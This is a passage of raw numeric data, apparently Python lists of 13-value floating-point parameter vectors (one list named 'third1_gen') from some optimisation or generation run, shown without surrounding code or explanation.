-1.8912926681237391e-06,\n -1.5244852134327217e-08, 9.114608510796109e-10, 193706809398.06177, \n 145429438824.56485], [6.417695307686038e-06, -1.2390179448049186e-12, -\n 2.0184675219747084e-13, 3.996761820973954e-11, -7.30077645678233e-11, -\n 1.0733818300903034e-15, 3.6521589033170274e-16, 2.7380751148035565e-05,\n -1.901967051200766e-06, -1.6531476837456585e-08, 8.659462633971021e-10,\n 291714681643.4888, 219358626907.00577], [7.269087955666727e-06, -\n 1.4398732474157131e-12, -1.745771866624504e-13, 5.5370858680922966e-11,\n -2.5212090845365535e-10, -1.1547640084684547e-15, \n 3.1826570991307717e-16, 2.4799848604697875e-05, -1.9802449310363633e-06,\n -1.4932011828861567e-08, 8.916225586049855e-10, 291814703950.912, \n 265497905413.09335], [5.9575073045674184e-06, -1.4591405170404072e-12, \n -1.7515686156504634e-13, 5.071091939607585e-11, -7.251972289899038e-11,\n -1.172163868062928e-15, 3.2003450301868095e-16, 2.236559796692659e-05, \n -1.964000257622103e-06, -1.461000086726312e-08, 8.924031273079037e-10, \n 441351014961.37744, 513124822279.29816], [7.118156558728498e-06, -\n 1.4213484509322684e-12, -1.7594919642528414e-13, 5.502275447498347e-11,\n -2.359264703422783e-10, -2.146866081339977e-15, 3.3020925008057705e-16,\n 2.48800717576552e-05, -1.8740196054647742e-06, -1.4681760148497176e-08,\n 9.194043116452982e-10, 480601682287.2741, 2166349399584.3464], [\n 6.435379358296727e-06, -1.449279705541305e-12, -1.791907685050265e-13, \n 4.013727926643595e-11, -2.561628978573389e-10, -1.1658376910672744e-15,\n 3.1916771926698506e-16, 2.706170262409588e-05, -1.9747493962051268e-06,\n -1.6529378614728517e-08, 8.945619840357268e-10, 480690251628.6576, \n 455217335045.56067], [7.273965294010602e-06, -1.4508582334938624e-12, -\n 1.2640181562203036e-13, 5.1256890020829106e-11, -2.347526011960417e-10,\n -1.1573810914157072e-15, 3.313802025100971e-16, 2.5248996663846427e-05,\n -1.8890715225154116e-06, -1.4830513494585048e-08, 9.024560997678787e-10,\n 513022508534.7746, 1741282758378.8208], [7.171513003462397e-06, -\n 1.4334443716578728e-12, -1.258745292341622e-13, 5.562080442549079e-11, \n -2.5310572250093563e-10, -2.177369178159867e-15, 3.269368594462498e-16,\n 2.5052523082312023e-05, -1.9593459141604013e-06, -\n 1.4665768665138152e-08, 8.920318373308913e-10, 559251400205.1976, \n 313686240874.89294]]\nthird1_gen = [[6.428534934734018e-06, -1.2348251959432863e-12, -\n 1.767418187059626e-13, 3.954772029523348e-11, -7.292041892016764e-11, -\n 1.1216042005993232e-15, 3.8462974452187554e-16, 2.732021800880368e-05, \n -1.912188850787629e-06, -1.6465861899672315e-08, 8.953663972360121e-10,\n 35914970214.05617, 208658422545.5101], [6.449609175276781e-06, -\n 1.2355212093166627e-12, -1.7892996139776768e-13, 3.978108705811362e-11,\n -7.260470610345522e-11, -1.128236668058653e-15, 3.8262320992212617e-16,\n 2.699492740612888e-05, -1.9285560276423494e-06, -1.6459368248390354e-08,\n 9.071692193685023e-10, 37667755025.66565, 260591174431.75333], [\n 6.393923513974502e-06, -1.2329510175057565e-12, -1.7878217157136278e-13,\n 4.009121098742944e-11, -7.243742739542879e-11, -1.119215448440791e-15, \n 3.855466000081844e-16, 2.7170577516281446e-05, -1.946180426984478e-06, \n -1.6356719885598995e-08, 9.071692193685023e-10, 41822657912.61174, \n 187148082730.9518], [6.393923513974502e-06, -1.2418411778899226e-12, -\n 1.7764720872488035e-13, 5.5839617178535e-11, -7.217875877484109e-11, -\n 1.1285205693786809e-15, 3.8241419562917457e-16, 2.727322263242888e-05, \n -1.9285560276423494e-06, -1.6299569164241514e-08, 8.954758973117168e-10,\n 45658359101.85514, 143455126000.2526], [6.412748625088242e-06, -\n 1.2418411778899226e-12, -1.7788474362949836e-13, 3.98996561577576e-11, \n -7.290920324596793e-11, -1.1258830930124426e-15, 3.8322709394594156e-16,\n 2.6978084672522227e-05, -1.9285560276423494e-06, -\n 1.6212095851483947e-08, 9.06465374180439e-10, 61888825971.955795, \n 378668457219.4866], [7.2950079161541e-06, -1.423600316370741e-12, -\n 1.8067111524974517e-13, 5.467528933636526e-11, -7.269174548770519e-11, \n -1.1131382577055909e-15, 3.642469974043324e-16, 2.442302310111588e-05, \n -1.9365154780516644e-06, -1.4736235919210341e-08, 9.02573445716291e-10,\n 72168008768.07632, 429565720321.34186], [7.277641363649251e-06, -\n 1.4186237292635021e-12, -1.7672076654522444e-13, 5.4875348972838477e-11,\n -7.250728822785179e-11, -1.1805107762756462e-15, 3.880180132520679e-16,\n 2.7230117388865188e-05, -1.79140018540739e-06, -1.6042437181983083e-08,\n 8.524740779894739e-10, 144497176198.74966, 733034177617.006], [\n 6.435449388867622e-06, -1.2375432988348708e-12, -1.8114977137612309e-13,\n 3.9353291584632385e-11, -7.306938943468394e-11, -1.1645955168783485e-15,\n 3.887993677152085e-16, 2.4432920122355823e-05, -1.927081007099796e-06, \n -1.644170413651962e-08, 9.09149545755435e-10, 151124978488.96066, \n 169172823395.74277], [7.278147471012389e-06, -1.4279386093057266e-12, -\n 1.7683419692117291e-13, 5.493758019518918e-11, -7.289146026177328e-11, \n -1.1733747472097884e-15, 3.675691109659462e-16, 2.4721354631465055e-05,\n -1.7638896999117907e-06, -1.588988736168235e-08, 8.632841256471107e-10,\n 202474467398.45615, 922092113586.5779], [7.177079530800026e-06, -\n 1.234976832476029e-12, -1.7526876652912844e-13, 5.534254133122458e-11, \n -7.205830797649949e-11, -1.120826019773443e-15, 3.8364837768074985e-16,\n 2.2258192147086412e-05, -1.7878127478583311e-06, -1.620023857736605e-08,\n 8.601004856702239e-10, 213869103072.6637, 175609972725.89545], [\n 6.350923506939188e-06, -1.2525603780194753e-12, -1.7993410193080307e-13,\n 5.465765498048408e-11, -7.243742739542879e-11, -1.1188147125437704e-15,\n 3.855466000081844e-16, 2.47790541156232e-05, -1.9163436765125797e-06, -\n 1.4800406168095671e-08, 9.043461740243768e-10, 224990894591.97565, \n 940216435276.2135], [6.375685299492019e-06, -1.2470011129066444e-12, -\n 1.7556981763399573e-13, 5.482994274294271e-11, -7.247391358991481e-11, \n -1.1737410455893592e-15, 3.8256427214483946e-16, 2.4747394888572957e-05,\n -1.921085601798487e-06, -1.655011267092608e-08, 9.011563904603084e-10, \n 242139334921.33466, 239644754200.97003], [6.474178960026375e-06, -\n 1.436844524248817e-12, -1.766513283684079e-13, 3.940038642964773e-11, -\n 7.181977887130175e-11, -1.1548751736666541e-15, 3.1745148598988346e-16,\n 2.707077658308786e-05, -1.92536072773705e-06, -1.6138736645669917e-08, \n 8.669699125562364e-10, 435950975348.6226, 363915964843.3034], [\n 6.393923513974502e-06, -1.4269415936091027e-12, -1.7684911527276688e-13,\n 5.480211712359269e-11, -7.243742739542879e-11, -1.1795054510279537e-15,\n 3.8683254669914693e-16, 2.7200371659468664e-05, -1.925930700762681e-06,\n -1.643396668485197e-08, 8.601004856702239e-10, 840789439847.5613, \n 886246867017.2574], [6.5292806963971566e-06, -1.2521788644307235e-12, -\n 1.752024719240228e-13, 5.432423395298522e-11, -7.243160061946103e-11, -\n 1.1728842336075722e-15, 3.642469974043324e-16, 2.4721354631465055e-05, \n -1.9201275577069358e-06, -1.6042437181983083e-08, 8.613978338195112e-10,\n 1220087240914.9465, 1538404370735.8923], [7.222746286095911e-06, -\n 1.4287928653696903e-12, -1.7798884315456173e-13, 5.47608522234827e-11, \n -7.177949793819456e-11, -1.1234835849356116e-15, 3.638627899273496e-16,\n 2.4725904181789833e-05, -1.7849753358990938e-06, -\n 1.6004659818379623e-08, 9.095587982641099e-10, 1457214324700.6113, \n 3971854766728.4727]]\n[1.5780628845471506e-10, -1.411490597458207e-12, -2.483949940281473e-13, \n 5.026488748046414e-11, -1.6612576871621329e-10, -1.6989844545344268e-15,\n 8.109443782655016e-16, 2.404048022255995e-05, -1.9859378185800262e-06, \n -1.6176901999289427e-08, 9.489903548622118e-10, 102704594939.3429, \n 145011267381.10236]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, \n 148817892429.6303]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, -1.7924226413310876e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.68878771600575e-08, 9.514461873186105e-10, 117267023779.58536, \n 138194745977.8172]\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.490649104258458e-13, \n 5.026488748046414e-11, -1.669670220497726e-10, -1.6989844545344268e-15,\n 8.109443782655016e-16, 2.3963751617497686e-05, -1.9859378185800262e-06,\n -1.6176901999289427e-08, 9.514461873186105e-10, 81279986793.6045, \n 148499957167.59894]\n[6.525636151737385e-10, -1.3197261044307544e-12, -2.4458923117817936e-13, \n 4.6265959327559024e-11, -1.6585443429963996e-10, -1.802849923078712e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.68878771600575e-08, 9.514461873186105e-10, 121168243931.69568, \n 138376625633.08905]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.59768924730343e-11, -1.6588127033784183e-10, -1.7924226413310876e-15,\n 9.085513864943156e-16, 2.3963751617497686e-05, -1.9859378185800262e-06,\n -1.6176901999289427e-08, 9.503282761551985e-10, 127284942067.54468, \n 147143586736.12967]\n[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, \n 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15,\n 8.4683341745183045e-16, 2.3963751617497686e-05, -1.9517021060346726e-06,\n -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, \n 148817892429.6303]\n[6.483959591091273e-10, -1.5516831882387681e-12, -2.477506624442777e-13, \n 5.026488748046414e-11, -1.669670220497726e-10, -1.7924226413310876e-15,\n 8.070333012129768e-16, 2.4138485475672502e-05, -1.9859378185800262e-06,\n -1.6108027319186075e-08, 9.514461873186105e-10, 78167992157.7952, \n 149819556305.94864]\n[2.8389500911155237e-10, -1.3179669217824132e-12, -2.1290409882195637e-13, \n 5.0376537605765665e-11, -1.7763084077799175e-10, -\n 1.8081388431942655e-15, 8.940150894056582e-16, 2.501288034169883e-05, -\n 2.04721003e-06, -1.5842532923181598e-08, 9.632771875757591e-10, \n 108694336300.90585, 154375559012.27695]\n[3.603083193105678e-11, -1.3197261044307544e-12, -2.213785963757499e-13, \n 4.581086934703742e-11, -1.6681614728164575e-10, -1.803564324024427e-15,\n 8.4683341745183045e-16, 2.4065016435368993e-05, -2.0711260096490455e-06,\n -1.7031696163247858e-08, 1.0052651438176042e-09, 98921398930.67514, \n 195080915978.15582]\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -2.3988654320236774e-13,\n 4.877026722101481e-11, -1.4519789238682426e-10, -1.8284483886533772e-15,\n 8.688144408462996e-16, 2.7398930354457147e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.90965422552221e-10, 100727388654.51337, \n 143318140783.98648]\n[-2.0926038768787875e-10, -1.4706748741606338e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.450370910345386e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.935114691513575e-10, 112772825510.86789, \n 160453198244.84198]\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, \n 4.764041880667976e-11, -1.8918518378579712e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7122228639393258e-05, -1.8099079507631247e-06,\n -1.8203397437532012e-08, 8.935114691513575e-10, 177535436392.6114, \n 109895891048.79645]\n[-2.0926038768787875e-10, -1.6406892521440393e-12, -1.9531413192683389e-13,\n 4.85603371945204e-11, -1.450370910345386e-10, -1.9257301298903336e-15, \n 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 8.935114691513575e-10, 150364957402.63327, \n 122880053749.32047]\n[-8.223802918909379e-10, -1.4625176901480844e-12, -2.703868659848318e-13, \n 4.852404641399239e-11, -1.896863627503491e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.697391208672331e-05, -1.7223534426462784e-06, \n -1.7212440323693525e-08, 8.377481199786938e-10, 199237170018.58218, \n 130994741061.18477]\n[-2.1118416643089627e-10, -1.459747004615292e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4471230416768517e-10, -1.9257301298903336e-15,\n 8.688144408462996e-16, 2.7267797101210102e-05, -1.8015495121292713e-06,\n -1.818410294118833e-08, 8.935114691513575e-10, 120611068648.22205, \n 148716985588.15564]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 190052435274.9098, \n 101545825010.15762]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4446129047664535e-10, -1.8210829282495652e-15,\n 8.731899868495941e-16, 2.4857867004975476e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 195239394048.3779, \n 101879284463.33914]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.88885, \n 102270797763.39908]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, \n 106305215455.77405]\n[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, \n 4.7704075824842225e-11, -1.8975666267494283e-10, -\n 1.9099300746589145e-15, 8.757096667187756e-16, 2.7122228639393258e-05, \n -1.809239966469619e-06, -1.8203397437532012e-08, 8.935114691513575e-10,\n 166731944707.48343, 109962566902.69849]\n[-2.0926038768787875e-10, -1.3235354562894133e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.5027518840822802e-10, -1.9355556139972827e-15,\n 8.69779310515605e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -\n 1.830053261436748e-08, 9.113315958572542e-10, 198705325524.15018, \n 111850971687.16727]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.858844276736905e-11, -1.5027518840822802e-10, -1.9257301298903336e-15,\n 8.765174154706532e-16, 2.507247127369048e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.134614417430693e-10, 152877011534.3794, \n 128488226222.4665]\n[-8.325113652893972e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8226533446456543e-15,\n 8.718221314640016e-16, 2.471871023322042e-05, -1.788813296914756e-06, -\n 1.836034443165441e-08, 9.148927620445716e-10, 115664967416.85544, \n 172987399752.44284]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.765346456450067e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 191606485390.66824, \n 100937635343.36494]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, \n 101220474756.5564]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.4730851235460287e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.24603, \n 101440046940.62292]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, \n 101479475091.5385]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 186125019263.05353, \n 101522685052.87083]\n[-8.372413642600907e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.826770959894538e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.675713932751666e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 176424094355.21158, \n 102059630396.96977]\n[-8.32774857282967e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.475667375214216e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7921694947468313e-06,\n -1.836034443165441e-08, 9.080472327376693e-10, 190619161162.84558, \n 102134941196.42899]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.835930442286039e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89273, \n 102270797763.3992]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9482957217087468e-13, \n 4.831070029448083e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.688144408462996e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89435, \n 102270797763.39929]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4446129047664535e-10, -1.8304219886094965e-15,\n 8.765174154706532e-16, 2.4857867004975476e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.087619653117874e-10, 191644867011.30374, \n 102518032445.5969]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.82400894161232e-11, -1.4446129047664535e-10, -1.8228595048374295e-15,\n 8.751158883884222e-16, 2.506841119647095e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 172947032775.99432, \n 102577021916.3392]\n[-2.103367158359051e-10, -1.3359785407261977e-12, -1.9376482536341035e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, \n 106305215455.77405]\n[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8161784527844478e-08, 9.087619653117874e-10, 144963603428.97382, \n 112061347287.60056]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.5026084747023036e-05, -1.7900208911755532e-06,\n -1.830053261436748e-08, 9.087619653117874e-10, 125853468889.92097, \n 136457449593.06062]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15,\n 8.765174154706532e-16, 2.4703687041471573e-05, -1.776082515662521e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 126137991779.33096, \n 160562679389.67618]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, \n 100125948657.42978]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 183895104728.34744, \n 101215117638.35565]\n[-2.0926038768787875e-10, -1.3382357152930057e-12, -1.9531413192683389e-13,\n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, \n 101220474756.5564]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11664, \n 101220474756.55742]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.476291648179518e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.4617, \n 101440046940.6675]\n[-2.0969974314689316e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, \n 101479475091.5385]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, \n 4.8730627003901226e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.58997, \n 101479475091.5439]\n[-2.0926038768787875e-10, -1.6370065196284276e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.4663924630161214e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.5149586855224063e-05, -1.8040587516026417e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 174674218067.03134, \n 101707557509.25955]\n[-2.0780704759852712e-10, -1.3359785407261977e-12, -1.928247479392491e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.815489945689696e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.830053261436748e-08, 9.081976758127089e-10, 177564736843.2668, \n 101910116331.42278]\n[-2.0926038768787875e-10, -1.3481496678499343e-12, -1.9612804716494087e-13,\n 4.869384519400452e-11, -1.4625361988654996e-10, -1.816149350524488e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.087619653117874e-10, 176677319245.07892, \n 101942928295.47075]\n[-8.324503936172223e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4535167828811644e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.063398319687734e-10, 161710635101.41095, \n 104790698646.6004]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8168585276282465e-11, -1.4675478300173032e-10, -\n 1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, \n -1.8015495121292713e-06, -1.830053261436748e-08, 9.102513898455556e-10,\n 160649925757.17908, 106424978687.80653]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.765174154706532e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.067222192179334e-10, 157509126624.7564, \n 106648081137.30634]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.87567764690249e-11, -1.473869541008466e-10, -1.8210829282495652e-15, \n 8.797810044472039e-16, 2.5128697145423343e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.089655956213592e-10, 156027014786.34595, \n 106784848298.00577]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.758120054489215e-16, 2.489589641570383e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.120599461707459e-10, 159857940983.01962, \n 106918161793.97298]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9347415380665696e-13, \n 4.85631967683728e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836417410231251e-08, 9.134390375783151e-10, 142628527511.76648, \n 117274357359.96004]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9567576322418712e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.120365536291957e-10, 136801158565.52109, \n 118996909122.33968]\n[-2.0926038768787875e-10, -1.3468298773490566e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.4730851235460287e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.13148553316506e-10, 131221998343.07083, \n 125656067768.88814]\n[-8.372802930516975e-10, -1.6610460978653825e-12, -1.9391155389121011e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.765346456450067e-16, 2.500200335107093e-05, -1.777109321965829e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 107442969837.9951, \n 191438895729.71088]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4659424506650604e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 185690352687.11697, \n 99223644222.007]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, \n 100125948657.42978]\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.849645416672899e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.714032924475303e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3534, \n 100180028793.61896]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.850709631603352e-08, 9.087619653117874e-10, 199924589208.46686, \n 100223589650.82378]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9654069739659012e-13, \n 4.855683396544643e-11, -1.461461940090847e-10, -1.803543054789903e-15, \n 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 178626169889.2221, \n 100558408593.70113]\n[-8.332310924150067e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8877585360256924e-11, -1.4675478300173032e-10, -\n 1.8130493256774034e-15, 8.763652695826297e-16, 2.4957985197946978e-05, \n -1.8015495121292713e-06, -1.836034443165441e-08, 